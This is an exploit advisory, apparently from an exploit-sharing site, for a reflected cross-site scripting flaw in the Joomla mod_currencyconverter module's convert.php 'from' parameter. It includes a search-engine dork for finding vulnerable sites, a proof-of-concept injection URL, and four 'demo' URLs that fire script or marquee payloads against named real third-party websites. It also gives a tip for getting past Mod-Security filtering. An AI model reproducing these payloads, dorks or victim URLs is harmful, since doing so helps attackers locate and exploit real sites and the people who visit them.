###############################################################################
# #
# More exploits: http://adf.ly/5EHaQ ! #
###############################################################################
# Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
# Date: 2012-02-02 [GMT +7]
# Author: BHG Security Center
# Software Link: http://joomla.org
# Dork: inurl:/includes/convert.php?from=
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
Joomla modules (mod_currencyconverter) XSS Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-02-02
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
------------- ( Cross Site Scripting ) ~
~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
------------- ( Demo Vulnerability ) ~
Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
Note: URL encoded GET input aonvert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [For Bypass Mod-Security]
Timeline:
~~~~~~~~~
- 29 - 01 - 2012 bug found.
- 01 - 02 - 2012 vendor contacted, but no response.
- 02 - 02 - 2012 Advisories release.
---------------------------------------------------------------------------
